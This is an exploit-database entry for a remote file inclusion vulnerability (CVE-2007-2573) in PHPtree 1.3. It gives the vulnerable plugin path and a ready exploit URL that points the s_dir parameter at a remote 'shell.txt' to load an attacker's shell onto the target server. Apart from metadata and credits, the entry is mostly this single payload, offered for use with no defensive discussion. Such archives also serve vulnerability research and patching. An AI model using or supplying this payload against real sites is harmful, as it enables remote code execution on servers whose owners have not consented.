PHPtree 1.3 - 'cms2.php?s_dir' Remote File Inclusion
Author: ThE TiGeR
type: webapps
platform: php
port:
date_added: 2007-05-04
date_updated:
verified: 1
codes: OSVDB-35819;CVE-2007-2573
tags:
aliases:
screenshot_url:
application_url:
#PHPtree Remote file inclusion (s_dir)
#Download script : http://www.phptree.de/content/download/public/phptree/phptree_v1.3.zip
#Thanks Str0ke
#Exploit
#http://site.com/[phptree_path]/plugin/HP_DEV/cms2.php?s_dir=shell.txt?
#Discovered by : ThE TiGeR
#Miro_Tiger100[at]Hotmail[dot]com
# milw0rm.com [2007-05-05]